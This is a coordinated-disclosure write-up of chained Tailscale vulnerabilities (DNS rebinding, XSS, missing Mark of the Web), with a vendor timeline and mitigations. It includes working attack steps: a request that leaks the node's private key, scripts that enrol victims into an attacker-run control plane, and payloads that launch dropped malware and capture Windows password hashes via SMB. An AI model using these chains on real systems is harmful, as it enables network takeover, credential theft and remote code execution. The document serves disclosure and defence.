Jamie McClymont & Emily Trau
Background
Tailscale is a mesh VPN service: nodes on a Tailscale network establish direct Wireguard connections to one another on-demand, using information pushed out by a central control plane (what IPs each node can be found at, what Wireguard public keys they use, which nodes are allowed to access which ports, etc.).
On each node, a process called tailscaled does all the heavy lifting – talking to the control plane, setting up the TUN interface, and carrying packets back and forth. A separate process provides a tray icon and configuration GUI in the Windows taskbar (or the macOS menu bar). On Linux, configuration is performed solely through the tailscale command-line utility. These front-end interfaces communicate with tailscaled through an HTTP API called the LocalAPI.
On unix platforms, the LocalAPI is bound to an AF_UNIX socket, with a tiered permission structure (basic read-only access for most unix users, privileged access for root or another specially designated user).
On Windows, which lacks (or lacked!) AF_UNIX, the LocalAPI instead binds to a loopback TCP socket, 127.0.0.1:41112. It checks netstat to enforce that incoming TCP connections are from the expected Windows user, emulating the unix socket privilege model described above.
In a world where our computers run only trusted code, these two approaches would provide equivalent security to one another. The world we actually live in is much, much, messier.
The Treacherous User Agent
If you visit my website, I am granted the honour and the privilege of executing arbitrary Javascript on your computer.
This is a pretty bad idea, but luckily even the web browser has its limits. If my code asks, for example, to perform an HTTP request to /var/run/tailscale/tailscaled.sock, I will be laughed out of the V8 engine before I can so much as connect(3).
If my code asks to speak to 127.0.0.1:41112, the browser is a little more receptive... but only a little. The types of requests I can make are limited, and I cannot read the responses.
If, on the other hand, my code asks to speak to my very own website... what could possibly be malicious about that? The browser allows arbitrary requests to be made, and responses to be read.
This last idea is known as the Same-Origin Policy, and is a critical layer of asbestos fireproofing keeping the modern web from going up in flames.
Unfortunately, the Same-Origin Policy is somewhat flawed in its interpretation of what is and is not "my website". Let's say I host my website at the memorable domain of s-1.2.3.4-127.0.0.1-12345-rr-e.d.rebind.it:
$ host s-1.2.3.4-127.0.0.1-12345-rr-e.d.rebind.it
s-1.2.3.4-127.0.0.1-12345-rr-e.d.rebind.it has address 1.2.3.4
$ host s-1.2.3.4-127.0.0.1-12345-rr-e.d.rebind.it
s-1.2.3.4-127.0.0.1-12345-rr-e.d.rebind.it has address 127.0.0.1
When my web page (which was initially loaded from a server at 1.2.3.4) wishes to make a request to its own domain, the browser will check with DNS again, just in case I've decided to move my web server down the street in the time since you loaded the page. Surprisingly, I have! My web server is now located at 127.0.0.1!
The browser dutifully carries out the request to this new IP address, without ever deeming the request to be Cross-Origin, since the domain of the webpage matches the domain of the new request. This is called a DNS Rebinding attack.
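To make the gap concrete, here is a minimal Python sketch of the comparison involved. It is an illustration, not browser code: the `RebindingResolver` class and the choice of port 41112 in the URLs are assumptions made for the example. The point it shows is that the origin check looks only at scheme, hostname, and port, while the IP address behind the hostname is free to change between lookups.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Return the (scheme, host, port) tuple compared by a same-origin check."""
    parts = urlsplit(url)
    port = parts.port or DEFAULT_PORTS[parts.scheme]
    return (parts.scheme, parts.hostname, port)


class RebindingResolver:
    """Hypothetical attacker-run DNS server: the first answer is the real web
    server, every later answer points at the victim's loopback interface."""

    def __init__(self, first_ip, rebound_ip):
        self.answers = [first_ip, rebound_ip]
        self.queries = 0

    def resolve(self, hostname):
        answer = self.answers[min(self.queries, 1)]
        self.queries += 1
        return answer


# Assumed URLs: the attacker serves the page on the same port as the target service.
page = "http://s-1.2.3.4-127.0.0.1-12345-rr-e.d.rebind.it:41112/index.html"
request = "http://s-1.2.3.4-127.0.0.1-12345-rr-e.d.rebind.it:41112/localapi/v0/status"

resolver = RebindingResolver("1.2.3.4", "127.0.0.1")
page_ip = resolver.resolve(urlsplit(page).hostname)        # initial page load
request_ip = resolver.resolve(urlsplit(request).hostname)  # later request from the page

same_origin = origin(page) == origin(request)
print(same_origin, page_ip, request_ip)  # True 1.2.3.4 127.0.0.1
```

The origin tuple never changes, so nothing in this check notices that the second request lands on a different machine.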
Issue 1 - LocalAPI vulnerable to DNS Rebinding on Windows
CVE: CVE-2022-41924
Advisory: TS-2022-004
Resolved in 1.32.3 (Host header allowlist implemented)
Applying this technique, our malicious website can make arbitrary requests to the LocalAPI. Since the API does not apply any additional authentication, apart from checking that our browser is running as the same Windows user as the Tailscale GUI, we have full privileges, and can introspect and reconfigure tailscaled to taste.
What will we do with our newfound abilities?
Information Disclosure
The status and whois endpoints expose details (hostnames, TS and real IP addresses, service lists) of the machines on the tailnet, as well as the names, email addresses, and profile pictures of machines' owners.
We can also learn the Wireguard private key used by the node. This is sanitised when the preferences are requested:
GET /localapi/v0/prefs HTTP/1.1
...
"PrivateNodeKey": "privkey:0000000000000000000000000000000000000000000000000000000000000000",
...
...but is revealed when preferences are updated:
PATCH /localapi/v0/prefs HTTP/1.1
{}
...
"PrivateNodeKey": "privkey:d8e0d574e0ef19adafe8ed83b6068f6dd47c4c2e3062342f4673c63488e5f75e",
...
This key should allow us to impersonate the targeted Windows node on the tailnet, opening Wireguard connections and accessing private services that should not be exposed to us. Unfortunately, there are some additional custom packets required to talk to a Tailscale node on top of pure Wireguard. The relevant code is open source, but using it would require writing an unconscionable amount of Go. Thus, we move on...
Becoming the Control Plane
A PATCH to /localapi/v0/prefs can be used to update ControlURL, moving the machine to an attacker-controlled control plane server, away from the default of https://controlplane.tailscale.com. The third-party open-source control plane server implementation, Headscale, will serve our purposes nicely.
Unfortunately, the ControlURL change doesn't take effect until the Tailscale client is restarted. In practice, this will likely mean waiting for the whole machine to reboot – likely not an insurmountable restriction in the age of automatic Windows Update installation.
We can process Headscale's logs to automatically accept new machines that appear into our malicious tailnet:
while(<>){/(?<=ter\/)nodekey:\w*/&&headscale -n meow nodes register --key $&}
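import re
import subprocess
import sys

# Reads Headscale's log on stdin; sys.argv[1] is the headscale binary to invoke.
seen = set()
r = re.compile(rb"(?<=/register/)nodekey:[^ ]*")
for line in sys.stdin.buffer:
    if (match := r.search(line)):
        key = match[0].decode().strip()
        # Register each node key once, however many times it is logged
        if key not in seen:
            subprocess.run([sys.argv[1], "-n", "meow", "nodes", "register", "--key", key])
            seen.add(key)
    # Pass the log through unchanged
    sys.stdout.buffer.write(line)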
Once the machine has rebooted and joined, we can access any network services the machine runs. While we're setting preferences through the LocalAPI, we can also configure the machine to act as an Exit Node, letting us access any other services on the same physical network as the targeted machine.
This sounds like a highly effective attack, as it gives us a position from which to move laterally within the target's traditional network, without running malicious code on the machine (except for the one-off Javascript to reconfigure tailscaled) – Tailscale is acting as a LOLBin, proxying us into the network.
In practice, access to the local network may not be as exciting a prospect against a Tailscale user as it would against nearly any other target. If they've fully bought in to the Tailscale way of doing things, there probably isn't anything particularly juicy sitting around unfirewalled on the traditional private network.
PopBrowserUR_Shell_
In theory, there is no path for a malicious Tailscale control plane to remotely execute code on your machine, unless you happen to run network services that are designed to allow it, like an SSH server with Tailscale-backed authentication. In practice:
aarch64 Windows doesn't have calc.exe; please accept this notepad-popping as a meager substitute
tailscaled is constantly long-polling the control plane, waiting for updates to the layout of your network. Sometimes, when you want to perform a privileged action, like SSHing to a locked-down server, Tailscale will ask you to re-authenticate yourself, by including a PopBrowserURL field in the response.
Issue 2 - Control plane can trigger code execution
Resolved in 1.32.3 through URL filtering
The daemon forwards this URL to the GUI, whose job is to open it in a web browser. The specifics of how this is implemented are unclear, as the GUI component is closed-source, and reverse-engineering Go binaries is about as fun as pulling teeth from an adorable blue gopher. Suffice to say it is implemented sub-optimally, as it allows the control plane to push out arbitrary paths for files to open.
How can we go from "open any path" to "execute any code"? Windows can open executables directly from WebDAV servers, which seems promising! If we push out the URL \\live.sysinternals.com\tools\Procmon64.exe, Tailscale will download and launch Procmon, but the user will be prompted before the program launches, as the downloaded file bears the Mark of the Web:
We can use another Tailscale feature to bypass the need for user interaction. Taildrop is a super-convenient feature, providing a UI to send files between devices owned by the same user on a tailnet. Taildrop can be enabled/disabled by the tailnet administrator, and it is off by default. Unfortunately, ever since your ControlURL was changed to point to a malicious server, your tailnet administrator has not been someone with your best interests at heart.
Issue 3 - Taildrop does not apply Mark of the Web
Resolved in 1.32.3 (MOTW and com.apple.quarantine applied)
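For readers unfamiliar with the mechanism: on Windows, the Mark of the Web is stored in an NTFS alternate data stream named Zone.Identifier attached to the downloaded file. The Python sketch below shows roughly what tagging a file involves. It is not Tailscale's implementation, the function names are made up for the example, and it does not cover the macOS com.apple.quarantine attribute.

```python
import os

# ZoneId=3 is the "Internet" zone, which triggers the launch prompt.
MOTW_CONTENT = "[ZoneTransfer]\r\nZoneId=3\r\n"


def motw_stream_path(path):
    """Path of the alternate data stream that carries the mark for `path`."""
    return path + ":Zone.Identifier"


def apply_mark_of_the_web(path):
    """Tag an already-saved file as downloaded from the internet.

    Returns True if the mark was written, False on platforms without
    NTFS alternate data streams.
    """
    if os.name != "nt":
        return False
    with open(motw_stream_path(path), "w", newline="") as stream:
        stream.write(MOTW_CONTENT)
    return True
```

A file receiver would call something like `apply_mark_of_the_web` right after writing the file to disk, before anything has a chance to open it.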
From another machine on the Headscale tailnet, we can Taildrop an arbitrary executable which will land on the victim's desktop. This file is not tainted with the Mark of the Web, so Tailscale will be able to launch it without user interaction. All we need to do is find it:
"PopBrowserURL": "C:\Users\___🤷♀️___\Desktop\malware.exe"
Perhaps it is possible to guess the target's Windows username from their email address, which we learned from rebinding to the LocalAPI status endpoint earlier. Perhaps the target is sitting on a network with an unauthenticated LDAP server, which we can bind to and enumerate usernames, using the victim as an Exit Node. There is a solution which applies much more generally, and like so much of Windows, it's remarkably cursed:
To learn the target's username, we must first learn their password.
"PopBrowserURL": "\\100.64.0.1"
We can ask Tailscale to open a path on an SMB share. Windows being Windows, it will send your username (and a hash of your login password) to this server, unprompted, despite having no reason to consider the server trustworthy.
Since we can make the SMB connection over Tailscale, we bypass any network-level egress filtering of SMB connections, which appears to be a commonly-recommended mitigation against this class of attack.
Now the Windows username is known, we can fill in the blank, and trigger execution of our code:
"PopBrowserURL": "C:\Users\jamie\Desktop\malware.exe"
Demo Time
Having discovered these three bugs, which we believed could be chained for RCE against any Windows Tailscale user, we were content. All that was left was to polish our demo. To do so, we first moved the server hosting the proof-of-concept from a local machine to one in the cloud. A quick re-test in Chrome, and...
None of these words are in the Bible.
This is certainly true of the King James Version, but many of these words can be found in what might as well be the Old Testament of Same-Origin Policy: the WhatWG Fetch Standard, which defines the CORS rules we are being accused of violating.
The Fetch Standard certainly does not define a way for a request targeting the same domain, protocol, and port as the requesting webpage to be considered Cross-Site. Apparently, at some point in the past 2022 years, a whole new standard came about:
Judge not according to the appearance, but judge righteous judgment -- John 7:24
The mitigation described here operates upon the IP address which the user agent actually connects to when loading a particular resource. This check MUST be performed for each new connection made, as DNS rebinding attacks may otherwise trick the user agent into revealing information it shouldn’t. -- WICG Private Network Access Standard §5.3 DNS Rebinding
DNS Rebinding is Dead
The effect of this policy, as currently implemented in Chrome and Edgium, appears to be that a site hosted in public IP address space cannot rebind to one hosted in private IP space. When the proof-of-concept was hosted at 192.168.1.172, we could attack all browsers just fine, but as soon as we moved it to the internet, these mitigations worked their mitigatory magic.
Firefox does not implement PNA, and is fully exploitable over the public internet using the bugs described above.
The IP addresses considered private by PNA are:
- 127.0.0.0/8; the IPv4 loopback space
- 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16; the RFC1918 IPv4 spaces
- 169.254.0.0/16; the IPv4 link-local space
- The IPv6-mapped versions of the above
- ::1/128; the IPv6 loopback space
- fc00::/7; the IPv6 Unique Local Address space
- fe80::/10; the IPv6 link-local unicast space
IPv6 tailnet addresses are chosen from the fc00::/7 space, so the attack should be usable for lateral movement within a tailnet against users. Notably, this strategy does not require an ACL which allows traffic to :41112 on the attacker's machine, due to the ability to opt out of the firewall previously discussed by Pulse Security.
Using issues 1-3, this gives us:
| | Windows+Firefox | Windows+Chrome | Non-Windows |
|---|---|---|---|
| No special access | Exploitable | Unexploitable? (PNA) | Not vulnerable |
| Same local network | Exploitable | Exploitable | Not vulnerable |
| Same Tailnet | Exploitable | Exploitable | Not vulnerable |
We just mentioned that IPv6 tailnet addresses are private.
IPv4 Tailscale addresses are not from RFC1918. They are not link-local, and they are certainly not loopback. IPv4 Tailscale addresses are RFC6598 CGNAT addresses, from the 100.64.0.0/10 space, a space that is not considered private by Chrome!
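The gap is easy to check against the list of ranges given above. The following Python sketch encodes that list using the standard `ipaddress` module. The function name `is_pna_private` is ours, and this is only a model of the classification as described in this post, not Chrome's actual code.

```python
import ipaddress

# The ranges listed in this post as private under PNA.
PNA_PRIVATE_NETWORKS = [
    ipaddress.ip_network(net)
    for net in (
        "127.0.0.0/8",     # IPv4 loopback
        "10.0.0.0/8",      # RFC1918
        "172.16.0.0/12",   # RFC1918
        "192.168.0.0/16",  # RFC1918
        "169.254.0.0/16",  # IPv4 link-local
        "::1/128",         # IPv6 loopback
        "fc00::/7",        # IPv6 Unique Local Addresses
        "fe80::/10",       # IPv6 link-local unicast
    )
]


def is_pna_private(address):
    """Return True if `address` falls in one of the ranges listed above."""
    ip = ipaddress.ip_address(address)
    # Treat ::ffff:a.b.c.d the same as the IPv4 address it wraps.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip.version == net.version and ip in net for net in PNA_PRIVATE_NETWORKS)


for candidate in ("127.0.0.1", "192.168.1.172", "fd00::1", "100.64.0.1", "100.100.100.100"):
    print(candidate, is_pna_private(candidate))
```

The first three addresses come out as private; both addresses in 100.64.0.0/10 do not, which is exactly the opening the next section relies on.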
Long Live DNS Rebinding
Tailscaled runs a web server at 100.100.100.100. This is all it does:
Issue 4 - Quad100 vulnerable to DNS Rebinding
Resolved in 1.32.3 (Host header allowlist implemented)
It ain't much, but it's rebindable, and it lets us learn the target's Tailnet IP address. And unlike the LocalAPI, this one works everywhere, not just Windows!
Hey, what's this?
This is the PeerAPI. It's an API exposed over HTTP, on a predictable port, to other nodes on the Tailnet. It's not used for the core functionality of Tailscale, but for additional features, like Taildrop, as well as for some introspection functionality.
Issue 5 - PeerAPI vulnerable to DNS Rebinding
CVE: CVE-2022-41925
Advisory: TS-2022-005
Resolved in 1.32.3 (Host header allowlist, introspection locked down)
What address space is it in? That's right, tailnet address space! We can rebind to Quad100, learn the target's tailnet address, calculate their PeerAPI port, rebind to that, dump their environment variables, learn about their other tailnet devices, and send them files via Taildrop.
How Taildrop Works
- When I want to send a file to one of my fellow Tailscale nodes, I connect to its PeerAPI, and PUT a file to /v0/put/$filename-of-my-choosing.
- tailscaled stores this file in a temporary location. On Windows, that's C:\ProgramData\Tailscale\files\$email-uid-$uid\$filename-of-my-choosing.
- tailscaled informs the GUI that a new file has arrived
- The GUI fetches the file from tailscaled through a GET request to the LocalAPI, and saves it to the desktop.
- The LocalAPI GET request is served with Content-Type: text/html.
Issue 6: Cross-Site Scripting in LocalAPI
Resolved in 1.32.3 through Content-Type fix, Content-Security-Policy, and request header checks
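As a rough illustration of what a safer file response could look like, here is a Python sketch that builds response headers for serving an untrusted file. The function name and the exact header values are our assumptions for the example and are not taken from Tailscale's patch. The idea is simply that the browser should be told to download the bytes, never to render them.

```python
from urllib.parse import quote


def safe_file_response_headers(filename):
    """Headers for serving an untrusted file so a browser will not render it."""
    return {
        # A generic binary type, so HTML in the file is never parsed as a page
        "Content-Type": "application/octet-stream",
        # Ask the browser to save the file instead of displaying it
        "Content-Disposition": "attachment; filename*=UTF-8''" + quote(filename, safe=""),
        # Forbid content sniffing back to text/html
        "X-Content-Type-Options": "nosniff",
        # Even if rendered, allow no scripts or other resources
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


headers = safe_file_response_headers("evil.html")
for name, value in headers.items():
    print(f"{name}: {value}")
```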
Exploiting this XSS issue in practice requires some trickery. As part of handling the LocalAPI GET request, tailscaled will delete the file from the temporary directory, since it has now been moved to its final location. This happens automatically, so we would need to win a race against the GUI to load our HTML before it is destroyed.
Instead, we discovered that if we upload multiple files with the same name in parallel, the various threads will fight over the shared filename, and some of the requests will end up failing, meaning that the file never gets deleted. We can load the HTML in an iframe, which is not prohibited by PNA:
<iframe src="http://127.0.0.1:41112/localapi/v0/files/evil.html"></iframe>
Now our Javascript is running in a true LocalAPI origin, we gain equivalent access to what we got from Issue 1, but without Chromium's pesky security features getting in the way.
The path to RCE from here is the same as earlier, but with an extra little bit of polish now available. On the very same day we discovered the XSS vulnerability, the first commits of a new feature were trickling into the main branch of the Tailscale GitHub repo. Fast User Switching (work in progress, not yet available in a released Tailscale version) allows Tailscale to switch between multiple accounts without logging out and logging in from scratch. As part of this, tailscaled may need to switch to another control plane server, without manually being restarted! We can use this feature to have our target machine join the Headscale tailnet in just a few seconds, no reboot required:
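// sleep() is not a built-in; a minimal promise-based helper
const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

// Remember the ID of the profile currently in use
let id =
  (await (await fetch("/localapi/v0/profiles/current", { method: "GET" }))
    .json()).ID;
// Point that profile at the attacker-controlled control plane
await fetch("/localapi/v0/prefs", {
  method: "PATCH",
  body: JSON.stringify({
    ControlURL: "http://1.2.3.4:8080",
    ControlURLSet: true,
  }),
});
await sleep(1000);
// Hop to another profile and back, so tailscaled reconnects without a restart
await fetch("/localapi/v0/profiles/", { method: "PUT" });
await sleep(1000);
await fetch("/localapi/v0/profiles/" + id, { method: "POST" });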
Demo Time, Again
By chaining issues 4, 5, 6, 2, and 3, we can finally achieve RCE against Chrome users over the public internet:
Issue 7: Your service here vulnerable to DNS rebinding?
Tailscale's documentation tends to encourage a model wherein web services are published to the Tailnet over unencrypted HTTP, and authentication is based solely on network position, whether implicitly (services lacking authentication) or explicitly (identifying the user with whois requests).
While we have not undertaken in-depth research here, we suspect that real-world Tailscale deployments have many high-impact rebindable web services.
Let's compare the Tailscale approach to two alternative models, in the context of DNS rebinding attacks:
BeyondCorp-style HTTPS access proxies
DNS Rebinding attacks generally don't work against HTTPS services: if the target's browser loads https://toggle-between-attacker-and-webmail.attacker.com and reaches out to the legitimate webmail server, it will be presented with a TLS certificate which does not match the rebound domain, and will throw a certificate error.
Implicitly-trusted flat network with internal HTTP services, traditional VPNs
Traditionally, this case would be equivalent to the Tailscale case. However, the advent of Private Network Access protection in Chromium-based browsers ends up providing what appears to be effective protection against rebinding attacks for these browsers in traditional private networks – protection which is unfortunately not extended to Tailscale customers.
Recommendations
This is a thorny issue, and we don't see an obvious mitigation for Tailscale to implement. The onus thus shifts to Tailscale's customers.
If you run non-HTTPS web services on your Tailnet, and those services are unauthenticated or rely on Tailscale for authentication, implement an allowlist of expected HTTP Host headers to prevent malicious Javascript from accessing these services.
This mitigation can be tested with curl – if you can put something random in the Host header, and you can view information or take actions which should not be available to the public, action is required:
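For services you write yourself, a Host allowlist can be only a few lines. The Python sketch below shows one possible shape using the standard library, together with a probe that performs the same check as the curl test: send a request with an unexpected Host header and see whether the service still answers. The hostnames in `ALLOWED_HOSTS` and the handler are hypothetical, so substitute the names your users actually type.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical names under which this service is legitimately reached.
ALLOWED_HOSTS = {"internal-wiki", "internal-wiki.example.ts.net", "100.64.0.5"}


def host_allowed(host_header):
    """True if the Host header (ignoring any port) is on the allowlist."""
    if not host_header:
        return False
    host = host_header.strip().lower()
    if host.startswith("["):          # bracketed IPv6 literal, e.g. [fd00::1]:80
        host = host[1:].split("]", 1)[0]
    elif ":" in host:                 # name:port or ipv4:port
        host = host.rsplit(":", 1)[0]
    return host in ALLOWED_HOSTS


class AllowlistHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Reject rebound requests before touching any application logic.
        if not host_allowed(self.headers.get("Host")):
            self.send_error(403, "Host not allowed")
            return
        body = b"internal data\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        pass  # keep the example quiet


def probe(port, host_header):
    """Send a GET with a chosen Host header to 127.0.0.1:port; return the status."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", "/", headers={"Host": host_header})
    status = conn.getresponse().status
    conn.close()
    return status


server = HTTPServer(("127.0.0.1", 0), AllowlistHandler)  # port 0: pick a free port
threading.Thread(target=server.serve_forever, daemon=True).start()
port = server.server_address[1]

rebound_status = probe(port, "random.attacker.example")
legit_status = probe(port, "internal-wiki")
server.shutdown()
server.server_close()
print(rebound_status, legit_status)  # 403 200
```

If the first probe had returned 200 instead of 403, the service would be answering requests for arbitrary hostnames, which is the condition a rebinding attack needs.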
Alternatively, you can use Tailscale's built-in TLS certificate support to run internal services with HTTPS (and with HTTP disabled or just redirecting to HTTPS), either directly or via something like caddy.
Tailscale has published remediation advice for this issue here.
Timeline and Vendor Response
The speed and quality of Tailscale's response to our report is unlike any vendor interaction I have experienced, and suggests a deep commitment to keeping their customers safe.
Times in NZDT (UTC+13):
- Mon 7 November: Emily starts research, identifies LocalAPI as rebindable
- Thu 10 November: Jamie joins research
- ...hacking in progress...
- Wed 16 November, 12:07AM: Report sent to [email protected], covering all 7 issues
- Wed 16 November, 2:04AM: Confirmation of receipt
- Wed 16 November, 4:54AM-9:11AM: Fixes for issues 1/2/4/5/6 committed, including several additional high-quality defence-in-depth mitigations on top of our suggested fixes
- Wed 16 November, 8:36AM: A bunch of Tailscale people are on a train. I'm not really certain how this affects things, but it's pretty cool
- Wed 16 November, 10:52AM: Full reply from Tailscale, containing:
- Details of all fixes made so far;
- Plans for additional fixes yet to be made, review of logs to check for past exploitation, etc;
- Request for our input on the completeness of the fix;
- Estimate of coordinated disclosure timeline;
- Vouchers for Tailscale Personal Pro accounts & Tailscale Merch;
- Offer of US$10,000 bounty, despite the Security page explicitly saying they do not have a bounty program!
- Wed 16 November, 4:17PM: We confirm that the major issues are resolved
- ...discussion and implementation of additional defense-in-depth measures; issue 3 resolved...
- Sat 19 November: Coordinated Disclosure time proposed by Tailscale, accepted by us, Tailscale shares planned Security Bulletins and blog post
- Tue 22 November, 5:06AM: Blog draft shared with Tailscale (a bit last minute, sorry!!!)
- Tue 22 November, 7:00AM: Coordinated disclosure time
Recommendations
Update to Tailscale v1.32.3, which was released today. Note that Tailscale does not automatically update itself. Administrators can see the current version running on all devices on the Tailscale admin page.
In descending order of priority, update:
- Windows machines with web browsers
- Other machines with web browsers
- Machines without web browsers
See Tailscale's blog post and bulletins (TS-2022-004 and TS-2022-005).
Keep using Tailscale! 💕